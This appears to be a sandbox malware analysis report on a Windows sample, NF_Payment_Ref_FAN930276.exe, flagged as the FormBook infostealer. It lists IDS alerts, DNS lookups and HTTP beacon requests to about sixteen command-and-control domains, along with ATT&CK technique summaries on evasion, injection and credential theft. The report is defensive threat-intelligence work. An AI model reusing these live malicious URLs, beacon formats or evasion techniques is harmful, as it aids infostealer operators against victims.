Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 3.33.130.190:80

Source: Joe Sandbox View	ASN Name: DV-PRIMARY-ASN1US DV-PRIMARY-ASN1US
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49709
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49901

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /up8i/?nl=FonQAt5G6G0h5a/+Am3eqIyjBFdIhrbRfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQd8jl3rIdXyfOz7R8oVB6YJtxbdf5wDUy9RxP636EXq/xHTA==&dbL=d8WX_v0PGVHXAtK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ladylawher.orgUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /9g6s/?nl=l/X+t9hb8CWGjOR1O2ZzXFDzhtuUnyzAQ4EIxPlc4MjqsNc2fQ5FEV3oB4t5s/ThvfRNUBaEClSQ3k3rscZvHeg0TpQiQ+GxS8ts4a8QVaH5DaPjZQFNvIogjfSTI3KXDA==&dbL=d8WX_v0PGVHXAtK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.meanttobebroken.orgUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /li8d/?nl=sm+xvlFNJ8Jn1MAvBLHfFbmpWDRmMBXnhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbroocsQ5/sNLlweHoyZNleSM2rCzfY5hv0qSgJrhCITOEEHg==&dbL=d8WX_v0PGVHXAtK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.jexiz.shopUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /3lre/?nl=/6Vdp+1Y21llHWrnJFgTkMelxgdakbST517P2ezUMEZQpYm2I4KB95g+5G1ZwATxC5oRicPrlKz7UaUXu7WnWVF0YU8xlLcjqFiWcTqSDyUhRRfYLZXOVM1ZwNUIzk+NCQ==&dbL=d8WX_v0PGVHXAtK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.prediksipreman.fyiUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /855d/?nl=2B0ERzH0P28lwthSCfczi4+l4RSaGiycEDtAIyO4xBEaITWb1iLHHs/q7NYM0I/g8MkSYcfxzku7nIYL4eoS8eZDgAyht6z65PzZnN779aUYRwuiIRWQuovW44/rxTRHXQ==&dbL=d8WX_v0PGVHXAtK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.givora.siteUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /jx6k/?nl=beqWGJ7SP2hkLKuH8Xmdr/HDPWeS3cMOlVU3zrC7D+GWWG+2bEVKgJQW/9jqYGl3wiT++u8kPbwe1lvFRaGrQmwW5G4wa8+lbGyMUfdWvdM0+8z00F7HMhpKv8gPeACQcQ==&dbL=d8WX_v0PGVHXAtK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.2925588.comUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /6o8s/?dbL=d8WX_v0PGVHXAtK&nl=xHDOnX+lWlIEr4hpJa7vJ+Ai0eztjiZ58G8B7DId8TM/qnePyNRX8+3i62aVr9vdoGnKMYHj9baJVFQ0pmQfJSNjzKPDt8hcfoZjjjTuXP86Dx4dRnWR0YG+vtOimu0PrA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.wrl-llc.netUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /l5ty/?nl=q+OYZAje5TGGPxrh2f4udvzeWAEqGa5tlfgg+KmPc/5JdZ3+06LBf09NB5PeZCRMfA3Rwmt3pN3KnHXg/BNAYr426YnMJAy4Y/PCGFK03Rpxpi13xz0yDihesG1rii3hcQ==&dbL=d8WX_v0PGVHXAtK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.7fh27o.vipUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /7n9v/?dbL=d8WX_v0PGVHXAtK&nl=5Ps3YXPo0Vj4JhRGre7eusiYM6VqaJdXpTrzI5rt8FAfia/wVGxKw+cKGzuZcepElfg31D2wj7kRRQ+omDm5eEZM56pgjuD4M6hDNIlUQpNxKD0Ll6OMyYftw5tyQwWC0A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.rebel.tiendaUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /izfe/?nl=ZqR1VSau/njxt8ya9FYdrisRnPwESR8PWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h1233SUSY5+fAIxnLEAPxNpmpufjlKG3bng8CVsKsGNybcU1g==&dbL=d8WX_v0PGVHXAtK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ila.beautyUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /lk0h/?dbL=d8WX_v0PGVHXAtK&nl=6gjDnw5yzGoGzEh3mjJB1T6RyTIMcIq1/sFM8kPHd8kBOmP5HGhCeqzML2uvlXpT0wvdsm4ji4CabuXPMFeElEmTDOsUVTaZy7krB/rdHBCDX+Ht0YGWoHEVrkeyh8Ng2A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.college-help.infoUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /17h7/?nl=+i5q+uzPXmftyZtNZWFr8MC7YoCmvyBt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBtoaIRC/e00OgY88L+a0UDDIyF3kq1BSJhp/lI21Ai+QA6UQ==&dbL=d8WX_v0PGVHXAtK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.owinvip.netUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /x3by/?nl=Gq0m/cYr7UOoL/rfxlXcWcb0PFgu3v+6IQg5KkZ1GbFCfXnP9OdFnXsg+153ZunkN9E3pnQymCUHBFpvF3MPrj7bwNIl4rM9hQX9D40sB8Q0fvNSVLrWgvNkuIucpqHerw==&dbL=d8WX_v0PGVHXAtK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.gucciqueen.shopUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /3p0l/?dbL=d8WX_v0PGVHXAtK&nl=4Jzo6X1Gluc/SF20pEVAyAZrEiE76xvvY+EfZYFlmMajnWRT/uq2dkdTzHDiVdaw3QhDvVFcv5rBuyftUViEMVRHp90uGCn944ajrH63wHv4zzWs5+CZDXB+Ld7sX0D68A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.timizoasisey.shopUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /f01d/?nl=BGh1WRbt41ta6S2FBwbFkSvU00HbY3eh/tMOUMfhmAze8NROyFh0EV68tSphjf8OeMOb/ck28qXApfwtDELR0J5SPWkS+xOxljfz11yABU5EX0aP/5qC9r+4s36BWCggxQ==&dbL=d8WX_v0PGVHXAtK HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.roopiedutech.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2

Source: global traffic	DNS traffic detected: DNS query: www.ladylawher.org
Source: global traffic	DNS traffic detected: DNS query: www.meanttobebroken.org
Source: global traffic	DNS traffic detected: DNS query: www.jexiz.shop
Source: global traffic	DNS traffic detected: DNS query: www.prediksipreman.fyi
Source: global traffic	DNS traffic detected: DNS query: www.givora.site
Source: global traffic	DNS traffic detected: DNS query: www.2925588.com
Source: global traffic	DNS traffic detected: DNS query: www.wrl-llc.net
Source: global traffic	DNS traffic detected: DNS query: www.7fh27o.vip
Source: global traffic	DNS traffic detected: DNS query: www.rebel.tienda
Source: global traffic	DNS traffic detected: DNS query: www.ila.beauty
Source: global traffic	DNS traffic detected: DNS query: www.college-help.info
Source: global traffic	DNS traffic detected: DNS query: www.owinvip.net
Source: global traffic	DNS traffic detected: DNS query: www.gucciqueen.shop
Source: global traffic	DNS traffic detected: DNS query: www.xtelify.tech
Source: global traffic	DNS traffic detected: DNS query: www.timizoasisey.shop
Source: global traffic	DNS traffic detected: DNS query: www.roopiedutech.online

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NF_Payment_Ref_FAN930276.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NF_Payment_Ref_FAN930276.exe.log

C:\Users\user\AppData\Local\Temp\Ea64OHKq

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
NF_Payment_Ref_FAN930276.exe

Function 04831C48 Relevance: .7, Instructions: 680
COMMON

Function 04CEAD88 Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Function 04CE590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Function 04CE44F0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 04CEB770 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 04CED658 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Function 048312C8 Relevance: 1.5, APIs: 1, Instructions: 49
windowCOMMON

Function 04CEAF78 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 048312D0 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Function 00417563 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre